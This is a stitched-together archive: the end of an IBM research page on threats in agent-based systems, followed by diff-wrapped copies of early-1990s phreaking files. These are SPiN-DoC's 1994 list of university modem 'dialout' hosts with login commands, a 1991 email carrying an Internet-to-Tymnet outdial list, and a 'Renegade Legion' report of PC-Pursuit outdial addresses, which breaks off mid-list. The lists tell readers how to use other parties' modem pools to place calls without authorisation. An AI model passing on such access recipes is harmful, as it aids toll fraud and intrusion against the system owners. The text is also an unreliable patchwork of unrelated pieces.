that it uses to survive. A Flying Dutchman may move from host to host, never
quite using enough resources to be killed; it may spawn a copy of itself on
another host just before it is terminated, ensuring an unending gene-line.
A Zombie is similar to a Flying Dutchman; it is a program that has been
terminated, but continues to consume some resources anyway, due to
(sometimes infinite) delays in cleaning up all the resources associated with
it. Zombies can sometimes get enough resources to do actual processing; more
often, they exist only as the undead owners of various kinds of space.
A single freeloading or immortal program will not in itself damage a
distributed system, and we anticipate that a typical agent-based system will
tolerate a low level of freeloading. An analogy is to physical stores, which
will tolerate a certain number of people coming in to get out of the rain
and using the restrooms, on the chance that they may eventually buy
something.
Uncontrolled, a large number of weeds can waste significant amounts of
system resources; distributed systems will need the ability to monitor this
sort of activity, and impose controls if it gets out of hand. Requests from
known freeloaders may be charged for, even in cases that are normally free.
Intelligent monitoring processes may be needed to identify and terminate
intentionally or accidentally immortal programs that are serving no useful
purpose. Other sorts of weeds will no doubt require other sorts of
solutions; the unexpected is likely.
----------------------------------------------------------------------------
The Usual Suspects
As well as these new and somewhat speculative threats, most of the
traditional computer-security worries, such as basic access control,
authentication, secure encryption, and so on, also apply to network and
agent security. IBM Research has various other security-related projects. Or
follow this link for some good leads on both traditional and non-traditional
computer security topics in the rest of the universe.
----------------------------------------------------------------------------
David Chess, chess@watson.ibm.com
Thanks to Gene Spafford at Purdue, whose talk "Viruses, Worms, and Things
that go Bump in the Net" may have inspired the title for this page; tricky
things, replicators!
----------------------------------------------------------------------------
[ IBM home page | Order | Search | Contact IBM | Help | (C) | (TM) ] 
File diff suppressed because it is too large Load Diff
+180
View File
@@ -0,0 +1,180 @@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Dialout List#5 - Compilled on 22/02/94
By SPiN-DoC
Mail spindoc@insane.apana.org.au
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Area Address(s) Command(s)
------ ------------------------------- ---------------------
602 129.219.17.3 login: MODEM
atdt 8xxx-xxxx
617 dialout.lcs.mit.edu
206 dialout24.cac.washington.edu
804 ublan.acc.virginia.edu c hayes
303 129.82.100.64 login: modem
307 modem.uwyo.edu
609 129.119.131.11x (x = 1 to 4)
*404 broadband.cc.emory.edu .modem8 or
.dialout
416 pacx.utcs.utoronto.ca modem
atdt 9xxx-xxxx
713 128.249.27.154 c modem96
atdt 9xxx-xxxx
713 128.249.27.153 " -+ as above +- "
714 130.191.4.70 atdt 8xxx-xxxx
514 132.204.2.11 externe#9 9xxx-xxxx
502 uknet.uky.edu outdial2400
atdt 9xxx-xxxx
412 gate.cis.pitt.edu LAT
connect dialout
^E
atdt 91k xxx-xxxx
416 annex132.berkely.edu atdt 9,,,,, xxx-xxxx
614 ns2400.ircc.ohio-state.edu DIAL
804 128.143.70.101 connect hayes
atdt xxx-xxxx
*404 128.140.1.239 .modem8|CR
or .modem96|CR
218 aa28.d.umn.edu cli
rlogin modem
at "login:" type
"modem"
218 modem.d.umn.edu "Hayes"
307 modem.uwyo.edu
313 35.1.1.6 "dial2400-aa" or
"dial1200-aa"
415 128.32.132.250 "dial1" or "dial2"
609 129.72.1.59 "Hayes"
128.119.131.110 "Hayes"
128.119.131.111
128.119.131.112
128.119.131.113
128.119.131.114
602 129.219.17.3 atdt8,,,,,xyyyxxxyyyy
615 dca.utk.edu "dial2400"
619 dialin.ucsd.edu "dialout"
128.54.30.1 nue
713 128.143.70.101 "connect hayes"
902 star.ccs.tuns.ca "dialout"
916 128.120.2.251 "dialout"
129.137.33.72
215 wiseowl.ocis.temple.edu atz
atdt 9xxxyyyy
602 129.219.17.3 login: MODEM
atdt 8xxx-xxxx
617 dialout.lcs.mit.edu
804 ublan.acc.virginia.edu c hayes
303 129.82.100.64 login: modem
307 modem.uwyo.edu
416 pacx.utcs.utoronto.ca modem
619 dialin.ucsd.edu dialout
713 128.249.27.153 Hayes
804 128.143.70.101 connect hayes
902 star.ccs.tuns.ca dialout
916 128.120.2.251 dialout
215 wiseowl.ocis.temple.edu atz
atdt 9xxxyyyy
713 128.249.27.153 Hayes
514 132.204.2.1 externe,9+number
215 wiseowl.ocis.temple.edu atz
atdt 9xxx-xxxx
303 yuma.acns.colostate.edu Modem
215 isn.upenn.edu hayes
609 129.72.1.59 Hayes
602 acssdial.inre.asu.edu atdt8,,,,,[x][yyy]xxxyyyy
614 ns2400.ircc.ohio-state.edu dial
804 ublan.virginia.edu connect hayes, 9,,xxx-xxxx
714 modem.nts.uci.edu atdt[area]0[phone]
714 130.191.4.70 atdt 8xxx-xxxx
502 UKNET.UKY.EDU CONNECT KECNET @ dial:
OUTDIAL2400 or OUT
412 gate.cis.pitt.edu lat, connect dialout
^E, dt91xxx-xxxx
416 pacx.utcs.utoronto.ca modem
307 modem.uwyo.edu
615 dca.utk.edu dial2400
619 128.54.30.1 atdt [area][phone]
902 star.ccs.tuns.ca dialout
202 modem.aidt.edu
402 modem.criegthon.edu
714 modem24.nts.uci.edu
617 mrmodem.wellesley.edu
413 dialout.smith.edu
413 dialout2400.smith.edu
602 dial9600.telcom.arizona.edu
603 dialout.unh.edu
503 dialout.uvm.edu
602 acssdial.inre.asu.edu
------ ------------------------------- ---------------------
UNKNOWN USA outdials.
------ ------------------------------- ---------------------
??? dialout24.cac.washington.edu
??? 128.54.30.1
??? 129.137.33.72
??? 128.200.142.3
??? 128.200.142.5
??? 128.200.142.121
??? modem_pool.runet.edu
??? modems.uwp.edu
??? modem.calvin.edu
??? modems.csuohio.edu
??? modem-o.caps.maine.edu
??? hmodem.capcollege.bc.ca
??? gmodem.capcollege.bc.ca
??? irmodem.ifa.hawaii.edu
??? 129.180.1.57
??? modem.ireq.hydro.qc.ca
??? modem_out12e7.atk.com
??? modem_out24n8.atk.com
??? engdial.cl.msu.edu
??? dialout.scu.edu
??? dialout1200.scu.edu
??? dialout2400.scu.edu
??? dialout9600.scu.edu
??? dialin.creighton.edu
??? outdial.louisville.edu
??? dial9600.umd.edu
??? dialout1200.unh.edu
??? alcat.library.nova.edu
??? dial96-np65.net.ubc.ca
??? dial24-nc00.net.ubc.ca
??? dial24-nc01.net.ubc.ca
??? dial.cc.umanitoba.ca
??? dialout24.afit.af.mil
??? dialout.plk.af.mil
??? dialout.cecer.army.mil
------ ------------------------------- ---------------------
Other NON-USA outdials.
--------- ------------------------------- ---------------------
AUSTRALIA ts-modem.une.oz.au
GERMANY annexdial.rz.uni-duesseldorf.de
UK dial96.ncl.ac.uk
*GLOBAL dial-low.dt.navy.mil
*GLOBAL dialout2400.smith.edu 5165 atdt 9-xxx-xxx-xxxx
--------- ------------------------------- ---------------------
KEY:
* = Seems to be down?
??? = Unknown area code.
NOTE: You may use this list to help compile your own lists if
(1) You contact me first.
(2) You mention the inclusion of my list.
(3) You aid me in the compilation of my own lists.
ie: Send me outdials/dialouts that I have not included.
This list has taken many hours of work to compile. Please
do not abuse my instructions. Fair is fair!
Well thats all we have for the fifth issue. More issues will
be coming out in about a month I suppose. Enjoy the dialouts,
and if you get any more, mail spindoc@insane.apana.org.au
(May not work) or /msg SPiN-DoC on IRC.
Anywayz, l8rz, and HAVE FUN!
-SPiN-DoC
+38
View File
@@ -0,0 +1,38 @@
Internet Dial-Outs
Area Address(s) Command(s)
------ ------------------------------- ---------------------
602 129.219.17.3 login: MODEM
atdt 8xxx-xxxx
617 dialout.lcs.mit.edu
206 dialout24.cac.washington.edu
804 ublan.acc.virginia.edu c hayes
303 129.82.100.64 login: modem
307 modem.uwyo.edu
609 129.119.131.11x (x = 1 to 4)
404 emory.edu .modem8 or
.dialout
416 pacx.utcs.utoronto.ca modem
atdt 9xxx-xxxx
713 128.249.27.154 c modem96
atdt 9xxx-xxxx
713 128.249.27.153 " -+ as above +- "
714 130.191.4.70 atdt 8xxx-xxxx
514 132.204.2.11 externe#9 9xxx-xxxx
515 isn.rdns.iastate.edu modem
atdt 8xxx-xxxx(2329011)
502 uknet.uky.edu outdial2400
atdt 9xxx-xxxx
412 gate.cis.pitt.edu LAT
connect dilout
^E
atdt 91k xxx-xxxx
416 annex132.berkely.edu atdt 9,,,,, xxx-xxxx
614 ns2400.ircc.ohio-state.edu DIAL
804 128.143.70.101 connect hayes
atdt xxx-xxxx
>404 128.140.1.239 .modem8|CR
> or .modem96|CR
>GLOBAL dialout2400.smith.edu 5165 atdt 9-xxx-xxx-xxxx
File diff suppressed because it is too large Load Diff
+677
View File
@@ -0,0 +1,677 @@
From t891368@otto.bf.rmit.OZ.AU Fri May 17 15:07:43 1991
Received: from munnari.OZ.AU by milton.u.washington.edu
(5.61/UW-NDC Revision: 2.1 ) id AA05809; Fri, 17 May 91 15:07:20 -0700
Received: from goanna.cs.rmit.OZ.AU by munnari.oz.au with SMTP (5.64+1.3.1+0.50)
id AA19323; Sat, 18 May 1991 08:06:59 +1000 (from t891368@otto.bf.rmit.OZ.AU)
Received: from otto.bf.rmit.OZ.AU by goanna.cs.rmit.oz.au with SMTP (5.61+++)
Received: by otto.bf.rmit.oz.au
Date: Sat, 18 May 91 08:05:15 +1000
From: t891368@otto.bf.rmit.OZ.AU (Mark)
Message-Id: <9105172205.13353@otto.bf.rmit.oz.au>
To: anatman%u.washington.edu@munnari.OZ.AU
Subject: Dialouts.
Status: R
Here are some inter/tymnet dialouts. Please limit the distribution of these
to tho who arent basically dorks. I.e. dont chan dump then to anyone.
Mark
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(I)nter(N)et->(T)ym(N)et List Version 1.0 - January 1991 -
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PrImEeViL of DaEmOns on I.C.E. Compiled This InterNet->TymNet List
Based on Information from InterNetDialOutListing Version III
and from TymNetInformationService Jan91
Basically, all OutDials were matched up with local TymNet Numbers.
Take Care - Enjoy
-PE
PS: None of these have been tested.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[206]
InterNet 128.95.136.242
Usage: Only accessible from on-campus domain addresses. Need a on-campus
gateway or account to reach this one...
Format: atdt 9,xxxXXXX
07631 # AUBURN WASHINGTON LOW 206/735-3975 300-2400/MNP
02703 # BELLEVUE/SEATTLE WASHINGTON HIGH 206/281-7141 2400/MNP
04706 # BELLEVUE/SEATTLE WASHINGTON HIGH 206/281-7141 2400/MNP
06551 # BELLINGHAM WASHINGTON LOW 206/671-5990 300-2400/MNP
05550 # BREMERTON WASHINGTON LOW 206/377-2792 300-2400/MNP
07631 # ENUMCLAW/AUBURN WASHINGTON LOW 206/735-3975 300-2400/MNP
05514 # LONGVIEW WASHINGTON LOW 206/423-9072 300-2400/MNP
03774 # PORT ANGELES WASHINGTON LOW 206/452-6800 300-2400/MNP
02703 # SEATTLE WASHINGTON HIGH 206/281-7141 2400/MNP
04706 # SEATTLE WASHINGTON HIGH 206/281-7141 2400/MNP
04020 # TACOMA WASHINGTON LOW 206/572-2026 300-2400/MNP
04061 # TACOMA WASHINGTON LOW 206/572-2026 300-2400/MNP
11252 # VANCOUVER WASHINGTON LOW 206/574-0427 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[218]
InterNet 131.212.32.110
Usage : After telnet connect, ready for hayes modem commands.
Format: atdt 9,xxxXXXX
11741 # DULUTH MINNESOTA LOW 218/722-0655 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[218] 9600 MODEM
InterNet 131.212.32.28
Usage : After telnet connect, type cli.
rlogin modem
modem
Format: atdt 9,xxxXXXX
11741 # DULUTH MINNESOTA LOW 218/722-0655 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[307]
InterNet 129.72.1.59
Usage : After telnet connect, ready for hayes modem commands.
Format: atdt ??? xxxXXXX --- could not connect to any bbses
02050 # CASPER WYOMING LOW 307/234-4211 300-2400/MNP
02163 # CHEYENNE WYOMING LOW 307/638-0403 300-2400/MNP
06221 # LARAMIE WYOMING LOW 307/742-9441 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[313]
InterNet 35.1.1.6
Usage : At the first prompt, type "dial2400-aa" or "dial1200-aa"
Note: This goes away Feb 4th - Will then need account. READ merit info.
Format: atdt 9,xxxXXXX
10307 # ANN ARBOR MICHIGAN MED 313/973-7935 300-2400/MNP
03344 # BURTON MICHIGAN LOW 313/743-8350 300-2400/MNP
04455 # DETROIT MICHIGAN HIGH 313/963-3460 2400/MNP
03530 # DETROIT MICHIGAN HIGH 313/963-3460 2400/MNP
03344 # FLINT/BURTON MICHIGAN LOW 313/743-8350 300-2400/MNP
04542 # PLYMOUTH MICHIGAN MED 313/451-2400 300-2400/MNP
07467 # PORT HURON MICHIGAN LOW 313/982-0301 300-2400/MNP
03654 # SOUTHFIELD MICHIGAN MED 313/424-8024 300-2400/MNP
11010 + SOUTHFIELD MICHIGAN MED 313/557-2106 9600 BPS
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[412]
InterNet 130.49.1.54
Usage : Unknown ?? -- No connect, could not ping
Format: atdt ??? xxxXXXX
07217 # GREENSBURG PENNSYLVANIA LOW 412/836-4470 300-2400/MNP
07217 # LATROBE/GREENSBURG PENNSYLVANIA LOW 412/836-4470 300-2400/MNP
02760 # NEW CASTLE PENNSYLVANIA LOW 412/658-5056 300-2400/MNP
04667 # PITTSBURGH PENNSYLVANIA HIGH 412/642-2015 2400/MNP
06570 + PITTSBURGH PENNSYLVANIA LOW 412/642-2271 9600
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[415]
InterNet 128.249.27.(152) (annex132.berkeley.edu) - 2400 baud
Usage : At the first prompt, type "dialer1" or "dialer2".
Format: atdt 9,xxxXXXX
05341 # ALAMEDA/OAKLAND CALIFORNIA HIGH 415/633-1896 300-2400/MNP
05350 # ANTIOCH CALIFORNIA LOW 415/754-8222 300-2400/MNP
04411 # BELMONT/REDWOOD CITY CALIFORNIA HIGH 415/361-8701 300-2400/MNP
05341 # BERKELEY/OAKLAND CALIFORNIA HIGH 415/633-1896 300-2400/MNP
04504 # BURLINGAME/SO. S.F. CALIFORNIA LOW 415/588-3043 300-2400/MNP
05362 # CONCORD/WALNUT CREEK CALIFORNIA MED 415/935-1507 300-2400/MNP
10436 # CONCORD/WALNUT CREEK CALIFORNIA MED 415/935-1507 300-2400/MNP
07117 # FREMONT CALIFORNIA MED 415/490-7366 300-2400/MNP
05341 # HAYWARD/OAKLAND CALIFORNIA HIGH 415/633-1896 300-2400/MNP
05341 # OAKLAND CALIFORNIA HIGH 415/633-1896 300-2400/MNP
11314 + OAKLAND CALIFORNIA LOW 415/638-7904 9600/MNP
05362 # PACHECO/WALNUT CREEK CALIFORNIA MED 415/935-1507 300-2400/MNP
10436 # PACHECO/WALNUT CREEK CALIFORNIA MED 415/935-1507 300-2400/MNP
04411 # PALO ALTO/REDWD CITY CALIFORNIA HIGH 415/361-8701 300-2400/MNP
05362 # PLEASNTHILL/WALNT CK CALIFORNIA MED 415/935-1507 300-2400/MNP
10436 # PLEASNTHILL/WALNT CK CALIFORNIA MED 415/935-1507 300-2400/MNP
04411 # REDWOOD CITY CALIFORNIA HIGH 415/361-8701 300-2400/MNP
06301 + REDWOOD CITY CALIFORNIA LOW 415/367-0334 9600/MNP
07417 + SAN FRANCISCO CALIFORNIA HIGH 415/495-7220 9600/MNP
07377 # SAN FRANCISCO CALIFORNIA HIGH 415/543-0691 300-2400/MNP
07420 # SAN FRANCISCO CALIFORNIA HIGH 415/543-0691 300-2400/MNP
04504 # SAN MATEO/SOUTH S.F. CALIFORNIA LOW 415/588-3043 300-2400/MNP
11270 # SAN RAFAEL CALIFORNIA LOW 415/453-2087 300-2400/MNP
04504 # SOUTH S.F. CALIFORNIA LOW 415/588-3043 300-2400/MNP
05362 # WALNUT CREEK CALIFORNIA MED 415/935-1507 300-2400/MNP
10436 # WALNUT CREEK CALIFORNIA MED 415/935-1507 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[513/606]
InterNet 129.137.33.72 (r596adi1.uc.edu) - 1200 baud
Usage : After connect count to 5 then hit enter once.
type: at (CR) at (CR), you should get a menu.
type O for outdial.
Format: atdt 9,xxxXXXX
07140 + CINCINNATI OHIO HIGH 513/489-1032 9600/MNP
06151 # CINCINNATI OHIO HIGH 513/530-9021 2400/MNP
05100 # CINCINNATI OHIO HIGH 513/530-9021 2400/MNP
07223 # DAYTON OHIO MED 513/898-0696 2400/MNP
04252 # SPRINGFIELD OHIO LOW 513/325-0511 300-2400/MNP
05774 # LEXINGTON KENTUCKY MED 606/266-7063 2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[609]
InterNet 128.112.131.(110 - 113) - 2400 baud
Usage : After telnet connect, ready for hayes modem commands.
Format: atdt 9,xxxXXXX
04351 # ATLANTIC CITY NEW JERSEY LOW 609/345-4050 300-2400/MNP
10105 # CAMDEN/PENNSAUKEN NEW JERSEY MED 609/665-5902 2400/MNP
10105 # CHERRY HILL/PENNSKN NEW JERSEY MED 609/665-5902 2400/MNP
10105 # PENNSAUKEN NEW JERSEY MED 609/665-5902 2400/MNP
10153 + SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-8388 9600/MNP
10622 # SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-9529 2400/MNP
10622 # SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-9529 2400/MNP
03652 # TRENTON NEW JERSEY LOW 609/394-1900 300-2400/MNP
04166 # TRENTON NEW JERSEY LOW 609/394-1900 300-2400/MNP
02252 # VINELAND NEW JERSEY LOW 609/691-6446 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[612]
InterNet 128.101.232.31 - ???? baud
Usage: Unknown ?? -- No connect, could not ping
Format: atdt ??? xxxXXXX
04321 # MINNEAPOLIS MINNESOTA HIGH 612/332-4024 2400/MNP
04425 # MINNEAPOLIS MINNESOTA HIGH 612/332-4024 2400/MNP
02377 + MINNEAPOLIS MINNESOTA HIGH 612/338-0845 9600/MNP
04425 # ST PAUL/MINNEAPOLIS MINNESOTA HIGH 612/332-4024 2400/MNP
04321 # ST PAUL/MINNEAPOLIS MINNESOTA HIGH 612/332-4024 2400/MNP
02323 # ST. CLOUD MINNESOTA LOW 612/251-4942 300-2400/MNP
02377 + ST. PAUL/MINNEAPOLIS MINNESOTA HIGH 612/338-0845 9600/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[614]
InterNet 128.146.6.127 (ns2400.ircc.ohio-state.edu) - 2400 baud
128.146.6.129 (ns1200.ircc.ohio-state.edu) - 1200 baud
Usage : At the prompt, type "dial".
Info about usage is displayed after connecting to service.
Format: atdt 9,xxxXXXX
04444 # COLUMBUS OHIO HIGH 614/221-1612 2400/MNP
04525 + COLUMBUS OHIO HIGH 614/224-0422 9600
03775 # NEWARK OHIO LOW 614/345-8953 300-2400/MNP
04074 # STEUBENVILLE/WNTSVL OHIO LOW 614/266-2170 300-2400/MNP
04074 # WINTERSVILLE OHIO LOW 614/266-2170 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[615]
InterNet 128.169.200.68 (dca.utk.edu) - 2400 baud
Usage : At the prompt, type "dial2400".
At the second prompt, type "d" to dial.
For more info type HELP, then select topic: DIALOUT
Format: 99KxxxXXXX
02432 # CHATTANOOGA TENNESSEE MED 615/265-1020 300-2400/MNP
05253 # CLARKESVILLE TENNESSEE LOW 615/645-8877 300-2400/MNP
10506 # JOHNSON CITY TENNESSEE LOW 615/928-9544 300-2400/MNP
02711 # KINGSPORT TENNESSEE LOW 615/378-5746 300-2400/MNP
10044 # KNOXVILLE TENNESSEE MED 615/693-0498 2400/MNP
04334 # NASHVILLE TENNESSEE HIGH 615/889-5790 2400/MNP
11315 # OAKRIDGE TENNESSEE LOW 615/482-1466 300-2400/MNP
02057 # SEVIERVILLE TENNESSEE LOW 615/453-0401 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[713]
InterNet 128.249.27.153 (modem24.bcm.tmc.edu) - 2400 baud
128.249.27.152 (modem12.bcm.tmc.edu) - 1200 baud
Usage : After telnet connect, ready for hayes modem commands.
Format: atdt 9,xxxXXXX
07717 # BAYTOWN TEXAS LOW 713/420-3389 300-2400/MNP
10021 # HOUSTON TEXAS HIGH 713/496-1332 2400/MNP
11130 # HOUSTON TEXAS HIGH 713/496-1332 2400/MNP
10713 + HOUSTON TEXAS HIGH 713/870-8381 9600/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[714]
InterNet 128.200.142.3 (modem.nts.uci.edu) - ???? baud
128.200.142.5 (tmodem.nts.uci.edu) - ???? baud
Usage: After telnet connect, ready for hayes modem commands.
Format: atdt 9xxxXXXX --- Could not connect with any numbers
not sure of format...
02644 + ANAHEIM/NEWPRT BEACH CALIFORNIA HIGH 714/752-1493 9600/MNP
06457 # ANAHEIM/NEWPRT BEACH CALIFORNIA HIGH 714/852-8141 300-2400/MNP
04236 # ANAHEIM/NEWPRT BEACH CALIFORNIA HIGH 714/852-8141 300-2400/MNP
04046 + COLTON CALIFORNIA MED 714/872-0394 9600/MNP
05325 # COLTON/RIVERSIDE CALIFORNIA MED 714/422-0222 300-2400/MNP
04263 # COVINA/DIAMOND BAR CALIFORNIA MED 714/860-0057 300-2400/MNP
04263 # DIAMOND BAR CALIFORNIA MED 714/860-0057 300-2400/MNP
02644 + IRVINE/NEWPORT BEACH CALIFORNIA HIGH 714/752-1493 9600/MNP
04236 # IRVINE/NEWPORT BEACH CALIFORNIA HIGH 714/852-8141 300-2400/MNP
02644 + NEWPORT BEACH CALIFORNIA HIGH 714/752-1493 9600/MNP
04236 # NEWPORT BEACH CALIFORNIA HIGH 714/852-8141 300-2400/MNP
04263 # ONTARIO/DIAMOND BAR CALIFORNIA MED 714/860-0057 300-2400/MNP
05325 # RIVERSIDE CALIFORNIA MED 714/422-0222 300-2400/MNP
05325 # SAN BERNADINO/RIVRSD CALIFORNIA MED 714/422-0222 300-2400/MNP
11273 # SAN CLEMENTE CALIFORNIA LOW 714/240-9424 300-2400/MNP
02644 + SANTA ANA/NEWPRT BCH CALIFORNIA HIGH 714/752-1493 9600/MNP
04236 # SANTA ANA/NEWPRT BCH CALIFORNIA HIGH 714/852-8141 300-2400/MNP
05046 # UPLAND CALIFORNIA LOW 714/985-1153 300-2400/MNP
04263 # W.COVINA/DIAMOND BAR CALIFORNIA MED 714/860-0057 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[801]
Internet addr : 128.187.1.2 - ???? baud
Usage: At the prompt, type "c modem"
Format: ??? 99KxxxXXXX
04447 # SALT LAKE UTAH HIGH 801/533-8152 2400/MNP
11500 + SALT LAKE CITY UTAH LOW 801/364-7605 9600/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[804]
Internet addr : 128.143.70.101 - 1200 baud
Usage : Hit Return, then at the prompt, type "CONNECT HAYES".
Format: atdt 9,xxxXXXX
10516 # CHARLOTTESVILLE VIRGINIA LOW 804/977-5661 300-2400/MNP
10256 # HAMPTON VIRGINIA MED 804/727-0572 300-2400/MNP
07737 # LYNCHBURG VIRGINIA LOW 804/846-0213 300-2400/MNP
10115 # MIDLOTHIAN/RICHMOND VIRGINIA MED 804/330-2673 2400/MNP
07676 # NEWPORT NEWS VIRGINIA MED 804/596-0898 2400/MNP
10346 # NORFOLK VIRGINIA MED 804/857-0148 2400/MNP
07372 # PETERSBURG VIRGINIA LOW 804/861-1788 300-2400/MNP
10346 # PORTSMOUTH/NORFOLK VIRGINIA MED 804/857-0148 2400/MNP
10115 # RICHMOND VIRGINIA MED 804/330-2673 2400/MNP
10346 # VIRGINIA BCH/NORFLK VIRGINIA MED 804/857-0148 2400/MNP
02435 # WILLIAMSBURG VIRGINIA LOW 804/229-6786 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[916]
Internet addr : 128.120.2.251 - 2400 baud
Usage : At the first prompt, type "dialout".
Wait few seconds and may get smart modem menu.
Format: atd 9,xxxXXXX
03307 # CHICO CALIFORNIA LOW 916/343-4401 300-2400/MNP
04722 # REDDING CALIFORNIA LOW 916/241-4820 300-2400/MNP
07542 + SACRAMENTO CALIFORNIA LOW 916/442-0992 9600/MNP
10130 # SACRAMENTO CALIFORNIA HIGH 916/447-7434 300-2400/MNP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
HaVeFuN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
R e n e g a d e L e g i o n
* * T e c h n i c a l R e p o r t s * *
* R * * L *
* *
Eastern Western
....
Net Runner ........ Overdose
The Knight ......... Sirus
Kingpin ... .... Meat
Highlander ... ....
Nemesis .....
Snuggle ....
Zardoz ....
Iceberg ... ...
... ...
.. ...
...
Presents
Report Number: 3.0
TYMNET PCP OUTDIALS: A listing of Pc-Pursuit out-dials usuable on Tymnet o
r most X.25 systems. These are very good quality outdi
als for the most part.
Compiled : 01/05/91
Author : Net Runner
Editor : Net Runner
System : TymNet PCPursuit Outdials
Uses : Calling to most major North American cities
Dialups : Multiple Tymnet dialups per LATA
Port : 2400 bps, 7 bits, Even Pairity, 1 Stop Bit
Emulation: ANSI, TTY, Vt-52, Vt-100
Thanks To:
Greets To:
Renegade Legion Sites
---------------------
- tmp down - Night City < RL World HQ >
617.625.7682 Night Elite < ERL Headquarters >
800.477.7691 x4430 Renegade Legion's VMB
Renegade Legion Name Abbreviations: ex. Net Runner ERL/P
--------------------------------------------------------
Prefixes Suffixes
-------- ---------
E - Eastern Division P - Precentor (Head of a branch east or west)
W - Western Division A - Adept, Head of unit under east or west branch
x C - Code/PBX/VMB Phreaking Unit
S - System Hacking Unit
N - Network Penetration Unit
-RL--------------------------------------------------------------Page 1
Pc-Pursuit and Datapac outidials make up the bulk of easilly accesable
outdials from Tymnet. The Datapac outdials are often shaky but the PCPursuit
ones tend to be stable.
On occasion, if you enter an additional 01 at the end of a PCPursuit NUA you
MAY get Global outdialing. Meaning dial 1+acn and call ANYWHERE in the USA.
Omit the spaces between the number sequences, they are only there for easy
reading. I also listed the PCPursuit city code in the descripptions.
Upon connecting to a PCPursuit or Datapac Outdial (OD) you should change to
8n1 bits. This makes life easier on BBSs.
PCPursuit ODs have a menuing system. Enter a: %<return> after connecting.
it will respond with: HELLO I'M READY *
At the * enter a 'd' for dial or 'r' for redial, '?' gives a menu. Remember
only dial xxx-xxxx no areacode and NO '-' in the numbers. It doesn't like tha
t. Only put 1+ac+n if trying to dial to another areacode from the OD.
Well, enough of that. Here's the list!
3110 2010 0001 ( 300 baud) (Newark, NJ)
3110 2010 0301 (1200 baud) (NJNEW)
3110 2010 0022 (2400 baud) (E.C. 201)
3110 2020 0115 ( 300 baud) (Washington, DC)
3110 2020 0116 (1200 baud) (DCWAS)
3110 2020 0117 (2400 baud) (E.C. 202, 703, 301)
3110 2030 0105 ( 300 baud) (Hartford, CT)
3110 2030 0120 (1200 baud) (CTHAR)
3110 2030 0121 (2400 baud) (E.C. 203)
3110 2060 0205 ( 300 baud) (Seattle, WA)
3110 2060 0206 (1200 baud) (WASEA)
3110 2060 0208 (2400 baud) (E.C. 206)
3110 2120 0315 ( 300 baud) (New-York, NY)
3110 2120 0316 (1200 baud) (NYNYO)
3110 2120 0028 (2400 baud) (E.C. 212, 1+718)
3110 2120 0412 (2400 baud)
3110 2130 0412 ( 300 baud) (Los Angeles, CA)
3110 2130 0413 (1200 baud) (CALAN)
3110 2130 0023 (2400 baud) (E.C. 213)
3110 2140 0117 ( 300 baud) (Dallas, TX)
3110 2140 0118 (1200 baud) (TXDAL)
3110 2140 0022 (2400 baud) (E.C. 214,817)
3110 2150 0112 ( 300 baud) (Philadelphia, PA)
3110 2150 0005 (1200 baud) (PAPHI)
3110 2150 0022 (2400 baud) (E.C. 215)
-RL-----------------------------------------------------------------Page 2
3110 2160 0020 ( 300 baud) (Clevland, OH)
3110 2160 0021 (1200 baud) (OHCLV)
3110 2160 0120 (2400 baud) (E.C. 216)
3110 3010 0020 (???? baud) (Washington, DC)
3110 3030 0114 ( 300 baud) (Denver, CO)
